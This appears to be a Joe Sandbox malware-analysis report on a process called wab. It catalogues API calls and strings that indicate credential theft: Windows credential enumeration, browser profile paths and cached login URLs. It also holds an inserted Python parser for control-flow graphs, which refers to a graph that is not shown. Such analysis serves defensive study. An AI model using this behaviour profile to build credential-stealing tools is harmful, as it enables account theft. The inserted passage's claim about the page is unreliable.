Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: memset$ByteChangeCharCloseFileFindFreeLocalMultiNotificationSizeWide_wcsicmpmemcmpmemcpy
• String ID:
• API String ID: 509814883-3916222277
• Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
• Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
• Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
• Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
• Graph export (basic blocks, call targets and edges; the rendered graph and its Executed / Not Executed colouring are not reproduced): control_flow_graph 848 41837f-4183bf 849 4183c1-4183cc call 418197 848->849 850 4183dc-4183ec call 418160 848->850 855 4183d2-4183d8 849->855 856 418517-41851d 849->856 857 4183f6-41840b 850->857 858 4183ee-4183f1 850->858 855->850 859 418417-418423 857->859 860 41840d-418415 857->860 858->856 861 418427-418442 call 41739b 859->861 860->861 864 418444-41845d CreateFileW 861->864 865 41845f-418475 CreateFileA 861->865 866 418477-41847c 864->866 865->866 867 4184c2-4184c7 866->867 868 41847e-418495 GetLastError ??3@YAXPAX@Z 866->868 871 4184d5-418501 memset call 418758 867->871 872 4184c9-4184d3 867->872 869 4184b5-4184c0 call 444706 868->869 870 418497-4184b3 call 41837f 868->870 869->856 870->856 878 418506-418515 ??3@YAXPAX@Z 871->878 872->871 878->856
APIs
• CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
• CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
• GetLastError.KERNEL32 ref: 0041847E
• ??3@YAXPAX@Z.MSVCRT ref: 0041848B
Strings
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: CreateFile$??3@ErrorLast
• String ID: |A
• API String ID: 1407640353-1717621600
• Opcode ID: 5aeeff076a9cd849f72a1ec08649adad283ef9ce1d91fa95086884072959f8da
• Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
• Opcode Fuzzy Hash: 5aeeff076a9cd849f72a1ec08649adad283ef9ce1d91fa95086884072959f8da
• Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
Uniqueness
• Uniqueness Score: -1.00%
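The two control_flow_graph lines above (the records for the functions at 40e175 and 41837f) are the textual form of the rendered graph. The Python below is an added editorial example, not part of the Joe Sandbox report or its IDA plugin: it parses that text into basic blocks, internal call sites and edges, and derives what an analyst would otherwise read off the picture, namely the imported APIs per function, the call targets (the addresses the "Part of subcall function" entries refer to), back edges (loops) and a call to the function's own entry (recursion). The token grammar is inferred from these two lines only and is an assumption; the report does not document the export format. Both graph strings are copied verbatim from this page.

```python
"""Parse the textual control-flow-graph export that appears in Joe Sandbox
function records (the "control_flow_graph ..." lines) and derive a few facts
an analyst normally reads off the rendered graph.

Grammar (assumed, inferred from the two graphs on this page, not documented):
  <id> <start>-<end>   begins a basic block: decimal block id, hex address range
  call <hex> [* <n>]   an internal call site in the current block, repeated n times
  <id>-><id>           a control-flow edge between block ids
  anything else        an imported API name reached from the current block
"""
import re
from dataclasses import dataclass, field

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
RANGE_RE = re.compile(r"^([0-9a-f]+)-([0-9a-f]+)$")

# Both graph lines copied verbatim from the function records on this page.
CFG_40E175 = (
    "control_flow_graph 763 40e175-40e1a1 call 40695d call 406b90 768 40e1a7-40e1e5 memset "
    "763->768 769 40e299-40e2a8 call 4069a3 763->769 771 40e1e8-40e1fa call 406e8f 768->771 "
    "775 40e270-40e27d call 406b53 771->775 776 40e1fc-40e219 call 40dd50 * 2 771->776 775->771 "
    "781 40e283-40e286 775->781 776->775 787 40e21b-40e21d 776->787 784 40e291-40e294 call 40aa04 "
    "781->784 785 40e288-40e290 ??3@YAXPAX@Z 781->785 784->769 785->784 787->775 "
    "788 40e21f-40e235 call 40742e 787->788 788->775 791 40e237-40e242 call 40aae3 788->791 "
    "791->775 794 40e244-40e26b _snwprintf call 40a8d0 791->794 794->775"
)
CFG_41837F = (
    "control_flow_graph 848 41837f-4183bf 849 4183c1-4183cc call 418197 848->849 "
    "850 4183dc-4183ec call 418160 848->850 855 4183d2-4183d8 849->855 856 418517-41851d 849->856 "
    "857 4183f6-41840b 850->857 858 4183ee-4183f1 850->858 855->850 859 418417-418423 857->859 "
    "860 41840d-418415 857->860 858->856 861 418427-418442 call 41739b 859->861 860->861 "
    "864 418444-41845d CreateFileW 861->864 865 41845f-418475 CreateFileA 861->865 "
    "866 418477-41847c 864->866 865->866 867 4184c2-4184c7 866->867 "
    "868 41847e-418495 GetLastError ??3@YAXPAX@Z 866->868 871 4184d5-418501 memset call 418758 867->871 "
    "872 4184c9-4184d3 867->872 869 4184b5-4184c0 call 444706 868->869 870 418497-4184b3 call 41837f 868->870 "
    "869->856 870->856 878 418506-418515 ??3@YAXPAX@Z 871->878 872->871 878->856"
)


@dataclass
class Block:
    start: int
    end: int
    calls: list = field(default_factory=list)  # internal call targets, one per call site
    apis: list = field(default_factory=list)   # imported API names in this block


@dataclass
class Cfg:
    blocks: dict = field(default_factory=dict)  # block id -> Block
    edges: list = field(default_factory=list)   # (src block id, dst block id)

    def entry_id(self) -> int:
        # The lowest-addressed block is the function entry.
        return min(self.blocks, key=lambda i: self.blocks[i].start)

    @property
    def entry(self) -> int:
        return self.blocks[self.entry_id()].start

    def api_names(self) -> set:
        return {a for b in self.blocks.values() for a in b.apis}

    def call_targets(self) -> list:
        return [t for b in self.blocks.values() for t in b.calls]

    def is_recursive(self) -> bool:
        # Some block calls the function's own entry address.
        return self.entry in self.call_targets()

    def back_edges(self) -> list:
        # Edges to a lower address are the loops in the function.
        return [(s, d) for s, d in self.edges
                if self.blocks[d].start < self.blocks[s].start]

    def exit_blocks(self) -> set:
        # Blocks with no successor are the return paths.
        return set(self.blocks) - {s for s, _ in self.edges}


def parse_cfg(text: str) -> Cfg:
    toks = text.split()
    if toks and toks[0] == "control_flow_graph":
        toks = toks[1:]
    cfg, cur, i = Cfg(), None, 0
    while i < len(toks):
        t = toks[i]
        if (m := EDGE_RE.match(t)):
            cfg.edges.append((int(m.group(1)), int(m.group(2))))
            i += 1
        elif t.isdigit() and i + 1 < len(toks) and (m := RANGE_RE.match(toks[i + 1])):
            cur = Block(int(m.group(1), 16), int(m.group(2), 16))
            cfg.blocks[int(t)] = cur
            i += 2
        elif cur is None:
            raise ValueError(f"token {t!r} appears before any block")
        elif t == "call":
            target, n, i = int(toks[i + 1], 16), 1, i + 2
            if i + 1 < len(toks) and toks[i] == "*" and toks[i + 1].isdigit():
                n, i = int(toks[i + 1]), i + 2   # "call X * n": n call sites to X
            cur.calls.extend([target] * n)
        else:
            cur.apis.append(t)
            i += 1
    return cfg


def summarize(cfg: Cfg) -> dict:
    return {
        "entry": f"{cfg.entry:x}",
        "blocks": len(cfg.blocks),
        "edges": len(cfg.edges),
        "apis": sorted(cfg.api_names()),
        "call_sites": len(cfg.call_targets()),
        "loops": len(cfg.back_edges()),
        "recursive": cfg.is_recursive(),
        "exits": sorted(cfg.exit_blocks()),
    }


if __name__ == "__main__":
    for line in (CFG_40E175, CFG_41837F):
        print(summarize(parse_cfg(line)))
```

Run on the two lines, the first graph yields 13 blocks, 20 edges, 11 internal call sites (40dd50 counted twice because of the "* 2"), one back edge from block 775 to block 771 and a single exit block (769); it is not recursive. The second yields 20 blocks and 27 edges, no back edge, a single exit block (856), and a call to its own entry 41837f from block 870 on the GetLastError path, which is how the CreateFileW/CreateFileA attempt is retried.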

Control-flow Graph
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: ??2@$HandleIconLoadModulememsetwcscpy
• String ID: r!A
• API String ID: 2791114272-628097481
• Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
• Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
• Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
• Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
  • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
  • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
  • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
  • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
  • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
  • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
  • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
• _wcslwr.MSVCRT ref: 0040C817
  • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
  • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
• wcslen.MSVCRT ref: 0040C82C
Strings
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$??3@$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                                                                                                                          • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                                                                                                                          • API String ID: 62308376-4196376884
                                                                                                                                                                                                          • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                                                                                          • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                                                                                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                                                                                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                                                                                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                                                                                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                                                                                                          • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                                                                          • _wcsncoll.MSVCRT ref: 0040BE38
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040BE91
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040BEB2
                                                                                                                                                                                                          • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                                                                                                                                          • wcschr.MSVCRT ref: 0040BF24
                                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc$CredEnumerateFreeLocal_wcsncoll_wcsnicmpmemcpymemsetwcschrwcslen
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3191383707-0
                                                                                                                                                                                                          • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                                                                                                                          • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 00403CBF
                                                                                                                                                                                                          • memset.MSVCRT ref: 00403CD4
                                                                                                                                                                                                          • memset.MSVCRT ref: 00403CE9
                                                                                                                                                                                                          • memset.MSVCRT ref: 00403CFE
                                                                                                                                                                                                          • memset.MSVCRT ref: 00403D13
                                                                                                                                                                                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                          • memset.MSVCRT ref: 00403DDA
                                                                                                                                                                                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                            • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                                                                                                                          • String ID: Waterfox$Waterfox\Profiles
                                                                                                                                                                                                          • API String ID: 3527940856-11920434
                                                                                                                                                                                                          • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                                                                                          • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                                                                                                                          • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 00403E50
                                                                                                                                                                                                          • memset.MSVCRT ref: 00403E65
                                                                                                                                                                                                          • memset.MSVCRT ref: 00403E7A
                                                                                                                                                                                                          • memset.MSVCRT ref: 00403E8F
                                                                                                                                                                                                          • memset.MSVCRT ref: 00403EA4
                                                                                                                                                                                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                          • memset.MSVCRT ref: 00403F6B
                                                                                                                                                                                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                            • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                                                                                                                          • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                                                                                                                          • API String ID: 3527940856-2068335096
                                                                                                                                                                                                          • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                                                                                                          • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
Uniqueness

Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 00403FE1
• memset.MSVCRT ref: 00403FF6
• memset.MSVCRT ref: 0040400B
• memset.MSVCRT ref: 00404020
• memset.MSVCRT ref: 00404035
  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
• memset.MSVCRT ref: 004040FC
  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
  • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
Strings
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
• String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
• API String ID: 3527940856-3369679110
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: memcpy
• String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
• API String ID: 3510742995-2641926074
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
  • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
  • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
• memset.MSVCRT ref: 004033B7
• memcpy.MSVCRT ref: 004033D0
• wcscmp.MSVCRT ref: 004033FC
• _wcsicmp.MSVCRT ref: 00403439
Strings
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
• String ID: $0.@
• API String ID: 3030842498-1896041820
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
• GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
• GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
• String ID:
• API String ID: 2941347001-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 00403C09
• memset.MSVCRT ref: 00403C1E
  • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
  • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
• wcscat.MSVCRT ref: 00403C47
  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
• wcscat.MSVCRT ref: 00403C70
Strings
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: memsetwcscat$Closewcscpywcslen
• String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
• API String ID: 3249829328-1174173950
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 0040A824
• GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
• wcscpy.MSVCRT ref: 0040A854
• wcscat.MSVCRT ref: 0040A86A
• LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
• LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
• String ID:
• API String ID: 669240632-0

APIs
• wcschr.MSVCRT ref: 00414458
• _snwprintf.MSVCRT ref: 0041447D
• WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
• GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
Strings
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: PrivateProfileString$Write_snwprintfwcschr
• String ID: "%s"
• API String ID: 1343145685-3297466227

APIs
• GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
• GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
• GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
Strings
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: AddressHandleModuleProcProcessTimes
• String ID: GetProcessTimes$kernel32.dll
• API String ID: 1714573020-3385500049

APIs
• memset.MSVCRT ref: 004087D6
  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
  • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
• memset.MSVCRT ref: 00408828
• memset.MSVCRT ref: 00408840
• memset.MSVCRT ref: 00408858
• memset.MSVCRT ref: 00408870
• memset.MSVCRT ref: 00408888
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
• String ID:
• API String ID: 2911713577-0

APIs
Strings
Memory Dump Source
